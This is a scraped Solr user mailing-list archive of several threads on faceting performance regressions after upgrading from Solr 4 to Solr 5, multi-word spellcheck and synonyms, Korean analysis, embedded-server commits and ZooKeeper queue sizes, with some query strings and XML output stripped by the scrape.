Further testing indicates that any performance difference is not due to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing deletes. The times appear to converge on an optimized index. Below are the details. Not sure what else to make of this at this point other than moving forward with an upgrade with an optimized index wherever possible. Scenario #1: Using facet.method=uif with faceting on several multi-valued fields. 4.8.1 (with deletes): 115 ms 5.5.2 (with deletes): 155 ms 4.8.1 (without deletes): 104 ms 5.5.2 (without deletes): 125 ms 4.8.1 (1 segment without deletes): 55 ms 5.5.2 (1 segment without deletes): 44 ms Scenario #2: Using facet.method=enum with faceting on several multi-valued fields. These fields are different than Scenario #1 and perform much better with enum hence that method is used instead. 4.8.1 (with deletes): 38 ms 5.5.2 (with deletes): 49 ms 4.8.1 (without deletes): 35 ms 5.5.2 (without deletes): 42 ms 4.8.1 (1 segment without deletes): 28 ms 5.5.2 (1 segment without deletes): 34 ms On Tue, Sep 27, 2016 at 3:45 AM, Alessandro Benedetti <abenede...@apache.org > wrote: > Hi ! > At the time we didn't investigate the deletion implication at all. > This can be interesting. > if you proceed with your investigations and discover what changed in the > deletion approach, I would be more than happy to help! > > Cheers > > On Mon, Sep 26, 2016 at 10:59 PM, Solr User <solr...@gmail.com> wrote: > > > Thanks again for your work on honoring the facet.method. I have an > > observation that I would like to share and get your feedback on if > > possible. > > > > I performance tested Solr 5.5.2 with various facet queries and the only > way > > I get comparable results to Solr 4.8.1 is when I expungeDeletes. Is it > > possible that Solr 5 is not as efficiently ignoring deletes as Solr 4? > > Here are the details. > > > > Scenario #1: Using facet.method=uif with faceting on several > multi-valued > > fields. > > 4.8.1 (with deletes): 115 ms > > 5.5.2 (with deletes): 155 ms > > 5.5.2 (without deletes): 125 ms > > 5.5.2 (1 segment without deletes): 44 ms > > > > Scenario #2: Using facet.method=enum with faceting on several > multi-valued > > fields. These fields are different than Scenario #1 and perform much > > better with enum hence that method is used instead. > > 4.8.1 (with deletes): 38 ms > > 5.5.2 (with deletes): 49 ms > > 5.5.2 (without deletes): 42 ms > > 5.5.2 (1 segment without deletes): 34 ms > > > > > > > > On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti < > > abenede...@apache.org> wrote: > > > > > Interesting developments : > > > > > > https://issues.apache.org/jira/browse/SOLR-9176 > > > > > > I think we found why term Enum seems slower in recent Solr ! > > > In our case it is likely to be related to the commit I mention in the > > Jira. > > > Have a check Joel ! > > > > > > On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti < > > > abenede...@apache.org> wrote: > > > > > > > I am investigating this scenario right now. > > > > I can confirm that the enum slowness is in Solr 6.0 as well. > > > > And I agree with Joel, it seems to be un-related with the famous > > faceting > > > > regression :( > > > > > > > > Furthermore with the legacy facet approach, if you set docValues for > > the > > > > field you are not going to be able to try the enum approach anymore. > > > > > > > > org/apache/solr/request/SimpleFacets.java:448 > > > > > > > > if (method == FacetMethod.ENUM && sf.hasDocValues()) { > > > > // only fc can handle docvalues types > > > > method = FacetMethod.FC; > > > > } > > > > > > > > > > > > I got really horrible regressions simply using term enum in both > Solr 4 > > > > and Solr 6. > > > > > > > > And even the most optimized fcs approach with docValues and > > > > facet.threads=nCore does not perform as the simple enum in Solr 4 . > > > > > > > > i.e. > > > > > > > > For some sample queries I have 40 ms vs 160 ms and similar... > > > > I think we should open an issue if we can confirm it is not related > > with > > > > the other. > > > > A lot of people will continue using the legacy approach for a > while... > > > > > > > > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com > > &g
Re: Faceting and Grouping Performance Degradation in Solr 5
Thanks again for your work on honoring the facet.method. I have an observation that I would like to share and get your feedback on if possible. I performance tested Solr 5.5.2 with various facet queries and the only way I get comparable results to Solr 4.8.1 is when I expungeDeletes. Is it possible that Solr 5 is not as efficiently ignoring deletes as Solr 4? Here are the details. Scenario #1: Using facet.method=uif with faceting on several multi-valued fields. 4.8.1 (with deletes): 115 ms 5.5.2 (with deletes): 155 ms 5.5.2 (without deletes): 125 ms 5.5.2 (1 segment without deletes): 44 ms Scenario #2: Using facet.method=enum with faceting on several multi-valued fields. These fields are different than Scenario #1 and perform much better with enum hence that method is used instead. 4.8.1 (with deletes): 38 ms 5.5.2 (with deletes): 49 ms 5.5.2 (without deletes): 42 ms 5.5.2 (1 segment without deletes): 34 ms On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti < abenede...@apache.org> wrote: > Interesting developments : > > https://issues.apache.org/jira/browse/SOLR-9176 > > I think we found why term Enum seems slower in recent Solr ! > In our case it is likely to be related to the commit I mention in the Jira. > Have a check Joel ! > > On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti < > abenede...@apache.org> wrote: > > > I am investigating this scenario right now. > > I can confirm that the enum slowness is in Solr 6.0 as well. > > And I agree with Joel, it seems to be un-related with the famous faceting > > regression :( > > > > Furthermore with the legacy facet approach, if you set docValues for the > > field you are not going to be able to try the enum approach anymore. > > > > org/apache/solr/request/SimpleFacets.java:448 > > > > if (method == FacetMethod.ENUM && sf.hasDocValues()) { > > // only fc can handle docvalues types > > method = FacetMethod.FC; > > } > > > > > > I got really horrible regressions simply using term enum in both Solr 4 > > and Solr 6. > > > > And even the most optimized fcs approach with docValues and > > facet.threads=nCore does not perform as the simple enum in Solr 4 . > > > > i.e. > > > > For some sample queries I have 40 ms vs 160 ms and similar... > > I think we should open an issue if we can confirm it is not related with > > the other. > > A lot of people will continue using the legacy approach for a while... > > > > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com> > > wrote: > > > >> The enum slowness is interesting. It would appear on the surface to not > be > >> related to the FieldCache issue. I don't think the main emphasis of the > >> JSON facet API has been the enum approach. You may find using the JSON > >> facet API and eliminating the use of enum meets your performance needs. > >> > >> With the CollapsingQParserPlugin top_fc is definitely faster during > >> queries. The tradeoff is slower warming times and increased memory usage > >> if > >> the collapse fields are used in faceting, as faceting will load the > field > >> into a different cache. > >> > >> Joel Bernstein > >> http://joelsolr.blogspot.com/ > >> > >> On Wed, May 18, 2016 at 5:28 PM, Solr User <solr...@gmail.com> wrote: > >> > >> > Joel, > >> > > >> > Thank you for taking the time to respond to my question. I tried the > >> JSON > >> > Facet API for one query that uses facet.method=enum (since this one > has > >> a > >> > ton of unique values and performed better with enum) but this was way > >> > slower than even the slower Solr 5 times. I did not try the new API > >> with > >> > the non-enum queries though so I will give that a go. It looks like > >> Solr > >> > 5.5.1 also has a facet.method=uif which will be interesting to try. > >> > > >> > If these do not prove helpful, it looks like I will need to wait for > >> > SOLR-8096 to be resolved before upgrading. > >> > > >> > Thanks also for your comment on top_fc for the CollapsingQParser. I > use > >> > collapse/expand for some queries but traditional grouping for others > >> due to > >> > performance. It will be interesting to see if those grouping queries > >> > perform better now using CollapsingQParser with top_fc. > >> > > >> > On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com> > >> > wrot
Re: Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE
Hi all - please help me here On Thursday, July 21, 2016, SRINI SOLR <srini.s...@gmail.com> wrote: > Hi All - > Could you please help me on spell check on multi-word phrase as a whole... > Scenario - > I have a problem with solr spellcheck suggestions for multi word phrases. With the query for 'red chillies' > > q=red+chillies=xml=true=true=true=true > > I get > > > > 2 > 4 > 12 > 0 > > chiller4 > challis2 > > > false > red chiller > > > The problem is, even though 'chiller' has 4 results in index, 'red chiller' has none. So we end up suggesting a phrase with 0 result. > > What can I do to make spellcheck work on the whole phrase only? > > Please help me here ...
Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE
Hi All - Could you please help me on spell check on multi-word phrase as a whole... Scenario - I have a problem with solr spellcheck suggestions for multi word phrases. With the query for 'red chillies' q=red+chillies=xml=true=true=true=true I get 2 4 12 0 chiller4 challis2 false red chiller The problem is, even though 'chiller' has 4 results in index, 'red chiller' has none. So we end up suggesting a phrase with 0 result. What can I do to make spellcheck work on the whole phrase only? Please help me here ...
Recommendations for analyzing Korean?
Hi - What's the current recommendation for searching/analyzing Korean? The reference guide only lists CJK: https://cwiki.apache.org/confluence/display/solr/Language+Analysis I see a bunch of work was done on https://issues.apache.org/jira/browse/LUCENE-4956, but it doesn't look like that was ever committed - and the last comment was years ago. There seem to be a few version of this in the wild, both more recent: https://github.com/juncon/arirang.lucene-analyzer-5.0.0, and the original: https://sourceforge.net/projects/lucenekorean/ but I'm not sure what's the canonical source at this point. I also see this: https://bitbucket.org/eunjeon/mecab-ko-lucene-analyzer Suggestions? Thanks, Tom
Re: Sorl 4.3.1 - Does not load the new data using the Java application
Hi Upayavira / Team - Can you please explain in-detail - how to do the commit...? if we do the commit - Will the new data will be available to Java Application with-out calling *embeddedSolrServer.* *getCoreContainer().load()*. again. ...? Please help me here ... Thanks in Advance. On Thu, Jun 9, 2016 at 4:08 PM, Upayavira <u...@odoko.co.uk> wrote: > Are you executing a commit? > > You must commit before your content becomes visible. > > Upayavira > > On Thu, 9 Jun 2016, at 11:13 AM, SRINI SOLR wrote: > > Hi Team - > > Can you please help me out on the below issue ... > > > > We are using the Solr 4.3.1 version. > > > > Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer. > > > > Using this EmbeddedSolrServer in java - loading the core container as > > below ... > > *embeddedSolrServer.getCoreContainer().load();* > > > > We are loading the container at the time of initiating the > > ApplicationContext. And now Java application is able to access the > > indexed > > data. > > > > *Now the issue is - * > > *If I index the new data in Solr - the same data is not getting loaded > > through Java application until and un-less if I again load the Core > > Container using **embeddedSolrServer.getCoreContainer().load().* > > > > Can you please help me out to on how to access the new data (which is > > indexed on Solr) using java application with out calling every-time > > *embeddedSolrServer.getCoreContainer().load().* > > > > *??? * > > > > *Please help me out ... I am stuck and not able to proceed further ... It > > is leading to critical issue ...* > > > > *Thanks In Advance.* >
Sorl 4.3.1 - Does not load the new data using the Java application
Hi Team - Can you please help me out on the below issue ... We are using the Solr 4.3.1 version. Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer. Using this EmbeddedSolrServer in java - loading the core container as below ... *embeddedSolrServer.getCoreContainer().load();* We are loading the container at the time of initiating the ApplicationContext. And now Java application is able to access the indexed data. *Now the issue is - * *If I index the new data in Solr - the same data is not getting loaded through Java application until and un-less if I again load the Core Container using **embeddedSolrServer.getCoreContainer().load().* Can you please help me out to on how to access the new data (which is indexed on Solr) using java application with out calling every-time *embeddedSolrServer.getCoreContainer().load().* *??? * *Please help me out ... I am stuck and not able to proceed further ... It is leading to critical issue ...* *Thanks In Advance.*
Re: Indexing a (File attached to a document)
Hi I am using MapReduceIndexer Tool to index data from hdfs , using morphlines as ETL tool. Specifying data path as xpath's in morphline file. sorry for delay -- View this message in context: http://lucene.472066.n3.nabble.com/Indexing-a-File-attached-to-a-document-tp4276334p4278730.html Sent from the Solr - User mailing list archive at Nabble.com.
Re: Faceting and Grouping Performance Degradation in Solr 5
Joel, Thank you for taking the time to respond to my question. I tried the JSON Facet API for one query that uses facet.method=enum (since this one has a ton of unique values and performed better with enum) but this was way slower than even the slower Solr 5 times. I did not try the new API with the non-enum queries though so I will give that a go. It looks like Solr 5.5.1 also has a facet.method=uif which will be interesting to try. If these do not prove helpful, it looks like I will need to wait for SOLR-8096 to be resolved before upgrading. Thanks also for your comment on top_fc for the CollapsingQParser. I use collapse/expand for some queries but traditional grouping for others due to performance. It will be interesting to see if those grouping queries perform better now using CollapsingQParser with top_fc. On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com> wrote: > Yes, SOLR-8096 is the issue here. > > I don't believe indexing with docValues is going to help too much with > this. The enum slowness may not be related, but I'm not positive about > that. > > The major slowdowns are likely due to the removal of the top level > FieldCache from general use and the removal of the FieldValuesCache which > was used for multi-value field faceting. > > The JSON facet API covers all the functionality in the traditional > faceting, and it has been developed to be very performant. > > You may also want to see if Collapse/Expand can meet your applications > needs rather Grouping. It allows you to specify using a top level > FieldCache if performance is a blocker without it. > > > > > Joel Bernstein > http://joelsolr.blogspot.com/ > > On Wed, May 18, 2016 at 10:42 AM, Solr User <solr...@gmail.com> wrote: > > > Does anyone know the answer to this? > > > > On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote: > > > > > I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but > > had > > > to abort due to average response times degraded from a baseline volume > > > performance test. The affected queries involved faceting (both enum > > method > > > and default) and grouping. There is a critical bug > > > https://issues.apache.org/jira/browse/SOLR-8096 currently open which I > > > gather is the cause of the slower response times. One concern I have > is > > > that discussions around the issue offer the suggestion of indexing with > > > docValues which alleviated the problem in at least that one reported > > case. > > > However, indexing with docValues did not improve the performance in my > > case. > > > > > > Can someone please confirm or correct my understanding that this issue > > has > > > no path forward at this time and specifically that it is already known > > that > > > docValues does not necessarily solve this? > > > > > > Thanks in advance! > > > > > > > > > > > >
Re: Faceting and Grouping Performance Degradation in Solr 5
Does anyone know the answer to this? On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote: > I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had > to abort due to average response times degraded from a baseline volume > performance test. The affected queries involved faceting (both enum method > and default) and grouping. There is a critical bug > https://issues.apache.org/jira/browse/SOLR-8096 currently open which I > gather is the cause of the slower response times. One concern I have is > that discussions around the issue offer the suggestion of indexing with > docValues which alleviated the problem in at least that one reported case. > However, indexing with docValues did not improve the performance in my case. > > Can someone please confirm or correct my understanding that this issue has > no path forward at this time and specifically that it is already known that > docValues does not necessarily solve this? > > Thanks in advance! > > >
Re: Filter query (fq) on comma seperated value does not work
Hi Ahmet / Team - Thanks for your quick response... Can you please help me out on this PatternTokenizer configuration... Here we are using configuration as below ... And also - I have made changes to the field value so that it is separated by space instead of commas and indexed the data as such... And now I was able to retrieve the expected results. But Still Can you help me out in achieving the results using the comma as you suggested. Thanks & Regards On Mon, May 16, 2016 at 5:50 PM, Ahmet Arslan <iori...@yahoo.com.invalid> wrote: > Hi, > > Its all about how you tokenize the category field. > It looks like you are using a string type, which does not tokenize at all > (e.g. verbatim) > Please use a PatterTokenizer and configure it so that it splits on comma. > > Ahmet > > > > On Monday, May 16, 2016 2:11 PM, SRINI SOLR <srini.s...@gmail.com> wrote: > Hi Team - > Can you please help me out on the following ... > > I have a following field in the solr document which has the comma seperated > values like below .. > > 1,456,768,345 doc1 > 456 doc2 > 1,456 doc3 > > So - Here I need to filter the search docs which contains category is > 456... > when i do like following ... > > fq=category:456 > > it is returning only one document doc2 which has only category is 456. > 456 > > But I need other two also which as this category 456 > > Can you please help me out to achieve this ... > > > Thanks & Regards >
Filter query (fq) on comma seperated value does not work
Hi Team - Can you please help me out on the following ... I have a following field in the solr document which has the comma seperated values like below .. 1,456,768,345 doc1 456 doc2 1,456 doc3 So - Here I need to filter the search docs which contains category is 456... when i do like following ... fq=category:456 it is returning only one document doc2 which has only category is 456. 456 But I need other two also which as this category 456 Can you please help me out to achieve this ... Thanks & Regards
Indexing a (File attached to a document)
Hi If I index a document with a file attachment attached to it in solr, can I visualise data of that attached file attachment also while querying that particular document? Please help me on this Thanks & Regards Vidya Nadella -- View this message in context: http://lucene.472066.n3.nabble.com/Indexing-a-File-attached-to-a-document-tp4276334.html Sent from the Solr - User mailing list archive at Nabble.com.
Multi-word Synonyms Solr 4.3.1 does not work
Hi All - Can you please help me out on the multi-word synonyms with Solr 4.3.1. I am using the synonyms as below test1,test2 => movie1 cinema,movie2 cinema,movie3 cinema I am able to success with the above syntax like - if I search for words like test1 or test2 then right hand side multi-word values are shown. But - I have a synonyms like below - multi-word on both the side left-hand and right-hand... test1 test, test2 test, test3 test =>movie1 cinema,movie2 cinema,movie3 cinema With the above left-hand multi-word format - not working as expected means Here below is the configuration I am using on query analyzer ... Please Help me
Faceting and Grouping Performance Degradation in Solr 5
I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had to abort due to average response times degraded from a baseline volume performance test. The affected queries involved faceting (both enum method and default) and grouping. There is a critical bug https://issues.apache.org/jira/browse/SOLR-8096 currently open which I gather is the cause of the slower response times. One concern I have is that discussions around the issue offer the suggestion of indexing with docValues which alleviated the problem in at least that one reported case. However, indexing with docValues did not improve the performance in my case. Can someone please confirm or correct my understanding that this issue has no path forward at this time and specifically that it is already known that docValues does not necessarily solve this? Thanks in advance!
EmbeddedSolrServer Loading Core Containers Solr 4.3.1
Hi Team - I am using Solr 4.3.1. We are using this EmbeddedSolrServer to load Core Containers in one of the java application. This is setup as a cron job for every 1 hour to load the new data on to the containers. Otherwise - the new data is not getting loaded on the containers , if we access from Java application even after re-indexing also. Please help here to resolve the issue ...?
want to subscribe
Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query
Mr. Uchida, Thank you for responding. It was my fault, I had a update processor which takes specific text and string fields and concatenates them into a single field, and I search on that single field. Recently I used Atomic update to fix a specific field's value and forgot to disable the UpdateProcessor chain...Since I was only updating one field the aggregate field got messed up with just that field value and hence I had issues searching. I reindexed the data again yesterday night and now it is all good. I do have a small question, when we update the zookeeper ensemble with new configs via 'upconfig' and 'linkconfig' commands do we have to "reload" the collections on all the nodes to see the updated config ?? Is there a single call which can update all nodes connected to the ensemble ?? I just went to the admin UI and hit "Reload" button manually on each of the node...Is that the correct way to do it ? Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida <tomoko.uchida.1...@gmail.com > wrote: > Are you sure that you've indexed same data to Solr 4.7.2 and 5.3.0 ? > If so, I suspect that you have multiple shards and request to one shard. > (In that case, you might get partial results) > > Can you share HTTP request url and the schema and default search field ? > > > 2015-10-02 6:09 GMT+09:00 Ravi Solr <ravis...@gmail.com>: > > > I we migrated from 4.7.2 to 5.3.0. I sourced the docs from 4.7.2 core and > > indexed into 5.3.0 collection (data directories are different) via > > SolrEntityProcessor. Currently my production is all whack because of this > > issue. Do I have to go back and reindex all again ?? Is there a quick fix > > for this ? > > > > Here are the results for the query 'obama'...please note the numfound. > > 4.7.2 has almost 148519 docs while 5.3.0 says it only has 5.3.0 docs. Any > > pointers on how to correct this ? > > > > > > Solr 4.7.2 > > > > > > > > 0 > > 2 > > > > obama > > 0 > > > > > > > > > > > > SolrCloud 5.3.0 > > > > > > > >0 > >2 > > > > obama > > 0 > > > > > > > > > > > > > > Thanks > > > > Ravi Kiran Bhaskar > > >
Re: Zk and Solr Cloud
Awesome nugget Shawn, I also faced similar issue a while ago while i was doing a full re-index. It would be great if such tips are added into FAQ type documentation on cwiki. I love the SOLR forum everyday I learn something new :-) Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 1:58 AM, Shawn Heisey <apa...@elyograg.org> wrote: > On 10/1/2015 1:26 PM, Rallavagu wrote: > > Solr 4.6.1 single shard with 4 nodes. Zookeeper 3.4.5 ensemble of 3. > > > > See following errors in ZK and Solr and they are connected. > > > > When I see the following error in Zookeeper, > > > > unexpected error, closing socket connection and attempting reconnect > > java.io.IOException: Packet len11823809 is out of range! > > This is usually caused by the overseer queue (stored in zookeeper) > becoming extraordinarily huge, because it's being flooded with work > entries far faster than the overseer can process them. This causes the > znode where the queue is stored to become larger than the maximum size > for a znode, which defaults to about 1MB. In this case (reading your > log message that says len11823809), something in zookeeper has gotten to > be 11MB in size, so the zookeeper client cannot read it. > > I think the zookeeper server code must be handling the addition of > children to the queue znode through a code path that doesn't pay > attention to the maximum buffer size, just goes ahead and adds it, > probably by simply appending data. I'm unfamiliar with how the ZK > database works, so I'm guessing here. > > If I'm right about where the problem is, there are two workarounds to > your immediate issue. > > 1) Delete all the entries in your overseer queue using a zookeeper > client that lets you edit the DB directly. If you haven't changed the > cloud structure and all your servers are working, this should be safe. > > 2) Set the jute.maxbuffer system property on the startup commandline for > all ZK servers and all ZK clients (Solr instances) to a size that's > large enough to accommodate the huge znode. In order to do the deletion > mentioned in option 1 above,you might need to increase jute.maxbuffer on > the servers and the client you use for the deletion. > > These are just workarounds. Whatever caused the huge queue in the first > place must be addressed. It is frequently a performance issue. If you > go to the following link, you will see that jute.maxbuffer is considered > an unsafe option: > > http://zookeeper.apache.org/doc/r3.3.3/zookeeperAdmin.html#Unsafe+Options > > In Jira issue SOLR-7191, I wrote the following in one of my comments: > > "The giant queue I encountered was about 85 entries, and resulted in > a packet length of a little over 14 megabytes. If I divide 85 by 14, > I know that I can have about 6 overseer queue entries in one znode > before jute.maxbuffer needs to be increased." > > https://issues.apache.org/jira/browse/SOLR-7191?focusedCommentId=14347834 > > Thanks, > Shawn > >
Re: Reverse query?
Hello Remi, Iam assuming the field where you store the data is analyzed. The field definition might help us answer your question better. If you are using edismax handler for your search requests, I believe you can achieve you goal by setting set your "mm" to 100%, phrase slop "ps" and query slop "qs" parameters to zero. I think that will force exact matches. Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 9:48 AM, Andrea Roggerone < andrearoggerone.o...@gmail.com> wrote: > Hi Remy, > The question is not really clear, could you explain a little bit better > what you need? Reading your email I understand that you want to get > documents containing all the search terms typed. For instance if you search > for "Mad Max", you wanna get documents containing both Mad and Max. If > that's your need, you can use a phrase query like: > > *"*Mad Max*"~2* > > where enclosing your keywords between double quotes means that you want to > get both Mad and Max and the optional parameter ~2 is an example of *slop*. > If you need more info you can look for *Phrase Query* in > https://wiki.apache.org/solr/SolrRelevancyFAQ > > On Fri, Oct 2, 2015 at 2:33 PM, remi tassing <tassingr...@gmail.com> > wrote: > > > Hi, > > I have medium-low experience on Solr and I have a question I couldn't > quite > > solve yet. > > > > Typically we have quite short query strings (a couple of words) and the > > search is done through a set of bigger documents. What if the logic is > > turned a little bit around. I have a document and I need to find out what > > strings appear in the document. A string here could be a person name > > (including space for example) or a location...which are indexed in Solr. > > > > A concrete example, we take this text from wikipedia (Mad Max): > > "*Mad Max is a 1979 Australian dystopian action film directed by George > > Miller <https://en.wikipedia.org/wiki/George_Miller_%28director%29>. > > Written by Miller and James McCausland from a story by Miller and > producer > > Byron Kennedy <https://en.wikipedia.org/wiki/Byron_Kennedy>, it tells a > > story of societal breakdown > > <https://en.wikipedia.org/wiki/Societal_collapse>, murder, and vengeance > > <https://en.wikipedia.org/wiki/Revenge>. The film, starring the > > then-little-known Mel Gibson <https://en.wikipedia.org/wiki/Mel_Gibson>, > > was released internationally in 1980. It became a top-grossing Australian > > film, while holding the record in the Guinness Book of Records > > <https://en.wikipedia.org/wiki/Guinness_Book_of_Records> for decades as > > the > > most profitable film ever created,[1] > > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-1> and > > has > > been credited for further opening the global market to Australian New > Wave > > <https://en.wikipedia.org/wiki/Australian_New_Wave> films.* > > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-2> > > <https://en.wikipedia.org/wiki/Mad_Max_%28franchise%29#cite_note-3>" > > > > I would like it to match "Mad Max" but not "Mad" or "Max" seperately, and > > "George Miller", "global market" ... > > > > I've tried the keywordTokenizer but it didn't work. I suppose it's ok for > > the index time but not query time (in this specific case) > > > > I had a look at Luwak but it's not what I'm looking for ( > > > > > http://www.flax.co.uk/blog/2013/12/06/introducing-luwak-a-library-for-high-performance-stored-queries/ > > ) > > > > The typical name search doesn't seem to work either, > > https://dzone.com/articles/tips-name-search-solr > > > > I was thinking this problem must have already be solved...or? > > > > Remi > > >
Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query
Thank you very much Erick and Uchida. I will take a look at the URL u gave Erick. Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 12:41 PM, Tomoko Uchida <tomoko.uchida.1...@gmail.com > wrote: > Hi Ravi, > > And for minor additional information, > you may want to look through Collections API reference guide to handle > collections properly in SolrCloud environment. (I bookmark this page.) > https://cwiki.apache.org/confluence/display/solr/Collections+API > <https://cwiki.apache.org/confluence/display/solr/Collections+API> > > Regards, > Tomoko > > 2015-10-03 1:15 GMT+09:00 Erick Erickson <erickerick...@gmail.com>: > > > do we have to "reload" the collections on all the nodes to see the > > updated config ?? > > YES > > > > Is there a single call which can update all nodes connected to the > > ensemble ?? > > > > NO. I'll be a little pedantic here. When you say "ensemble", I'm not > quite > > sure > > what that means and am interpreting it as "all collections registered > with > > ZK". > > But see below. > > > > I just went to the admin UI and hit "Reload" button manually on each > > of the node...Is that > > the correct way to do it ? > > > > NO. The admin UI, "core admin" is a remnant from the old days (like > > 3.x) where there was > > no concept of distributed collection as a distinct entity, you had to > > do all the things you now > > do automatically in SolrCloud "by hand". PLEASE DO NOT USE THIS > > EXCEPT TO VIEW A REPLICA WHEN USING SOLRCLOUD! In particular, don't try > to > > take any action that manipulates the core (reload, add, unload and the > > like). > > It'll work, but you have to know _exactly_ what you are doing. Go > > ahead and use it for > > viewing the current state of a replica/core, but unless you need to do > > something that > > you cannot do with the Collections API it's very easy to go astray. > > > > > > Instead, use the "collections API". In this case, there's a call like > > > > > > > http://localhost:8983/solr/admin/collections?action=RELOAD=CollectionName > > > > that will cause all the replicas associated with the collection to be > > reloaded. Given you > > mentioned linkconfig, I'm guessing that you have more than one > > collection looking at a > > particular configset, so the pedantic bit is you'd have to issue the > > above for each > > collection that references that configset. > > > > Best, > > Erick > > > > P.S. Two bits: > > 1> actually the collections API uses the core admin calls to > > accomplish its tasks, but > > lots of effort went in to doing exactly the right thing > > 2> Upayavira has been creating an updated admin UI that will treat > > collections as > > first-class citizens (a work in progress). You can access it in 5.x by > > hitting > > > > solr_host:solr_port/solr/index.html > > > > Give it a whirl if you can and please provide any feedback you can, it'd > > be much > > appreciated. > > > > On Fri, Oct 2, 2015 at 7:47 AM, Ravi Solr <ravis...@gmail.com> wrote: > > > Mr. Uchida, > > > Thank you for responding. It was my fault, I had a update > > processor > > > which takes specific text and string fields and concatenates them into > a > > > single field, and I search on that single field. Recently I used Atomic > > > update to fix a specific field's value and forgot to disable the > > > UpdateProcessor chain...Since I was only updating one field the > aggregate > > > field got messed up with just that field value and hence I had issues > > > searching. I reindexed the data again yesterday night and now it is all > > > good. > > > > > > I do have a small question, when we update the zookeeper ensemble with > > new > > > configs via 'upconfig' and 'linkconfig' commands do we have to "reload" > > the > > > collections on all the nodes to see the updated config ?? Is there a > > single > > > call which can update all nodes connected to the ensemble ?? I just > went > > to > > > the admin UI and hit "Reload" button manually on each of the node...Is > > that > > > the correct way to do it ? > > > > > > Thanks > > > > > > Ravi Kiran Bhaskar > > > > > > On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida < > > tomoko.uchida.1...@gmail.com > > >>
Solr 4.7.2 Vs 5.3.0 Docs different for same query
I we migrated from 4.7.2 to 5.3.0. I sourced the docs from 4.7.2 core and indexed into 5.3.0 collection (data directories are different) via SolrEntityProcessor. Currently my production is all whack because of this issue. Do I have to go back and reindex all again ?? Is there a quick fix for this ? Here are the results for the query 'obama'...please note the numfound. 4.7.2 has almost 148519 docs while 5.3.0 says it only has 5.3.0 docs. Any pointers on how to correct this ? Solr 4.7.2 0 2 obama 0 SolrCloud 5.3.0 0 2 obama 0 Thanks Ravi Kiran Bhaskar
Re: bulk reindexing 5.3.0 issue
Gili I was constantly checking the cloud admin UI and it always stayed Green, that is why I initially overlooked sync issues...finally when all options dried out I went individually to each node and quieried and that is when i found the out of sync issue. The way I resolved my issue was shut down the leader that was not synching properly and let another node become the leader, then reindex all docs. Once the reindexing is done I started the node that was causing the issue and it synched properly :-) Thanks Ravi Kiran Bhaskar On Mon, Sep 28, 2015 at 10:26 AM, Gili Nachum <gilinac...@gmail.com> wrote: > Were all of shard replica in active state (green color in admin ui) before > starting? > Sounds like it otherwise you won't hit the replica that is out of sync. > > Replicas can get out of sync, and report being in sync after a sequence of > stop start w/o a chance to complete sync. > See if it might have happened to you: > > http://mail-archives.apache.org/mod_mbox/lucene-solr-user/201412.mbox/%3CCAOOKt53XTU_e0m2ioJ-S4SfsAp8JC6m-=nybbd4g_mjh60b...@mail.gmail.com%3E > On Sep 27, 2015 06:56, "Ravi Solr" <ravis...@gmail.com> wrote: > > > Erick...There is only one type of String > > "sun.org.mozilla.javascript.internal.NativeString:" and no other > variations > > of that in my index, so no question of missing it. Point taken regarding > > the CURSORMARK stuff, yes you are correct, my head so numb at this point > > after working 3 days on this, I wasnt thinking straight. > > > > BTW I found the real issue, I have a total of 8 servers in the solr > cloud. > > The leader for this specific collection was the one that was returning 0 > > for the searches. All other 7 servers had roughly 800K docs still needing > > the string replacement. So maybe the real issue is sync among servers. > Just > > to prove to myself I shutdown the solr that was giving zero results > (i.e. > > all uuid strings have already been somehow devoid of spurious > > sun.org.mozilla.javascript.internal.NativeString on that server). Now it > > ran perfectly fine and is about to finish as last 103K are still left > when > > I was writing this email. > > > > So the real question is how can we ensure that the Sync is always > > maintained and what to do if it ever goes out of Sync, I did see some > Jira > > tickets from previous 4.10.x versions where Sync was an issue. Can you > > please point me to any doc which says how SolrCloud synchs/replicates ? > > > > Thanks, > > > > Ravi Kiran Bhaskar > > > > Thanks > > > > Rvai Kiran Bhaskar > > > > On Sat, Sep 26, 2015 at 11:00 PM, Erick Erickson < > erickerick...@gmail.com> > > wrote: > > > > > bq: 3. Erick, I wasnt getting all 1.4 mill in one shot. I was initially > > > using > > > 100 docs batch, which, I later increased to 500 docs per batch. Also it > > > would not be a infinite loop if I commit for each batch, right !!?? > > > > > > That's not the point at all. Look at the basic logic here: > > > > > > You run for a while processing 100 (or 500 or 1,000) docs per batch > > > and change all uuid fields with this statement: > > > > > > uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", ""); > > > > > > and then update the doc. You run this as long as you have any docs > > > that satisfy the query "q=uuid:sun.org.mozilla*", _changing_ > > > every one that has this string! > > > > > > At that point, theoretically, no document in your index has this > string. > > So > > > running your update program immediately after should find _zero_ > > documents. > > > > > > I've been assuming your complaint is that you don't process 1.4 M docs > > (in > > > batches), you process some lower number then exit and you 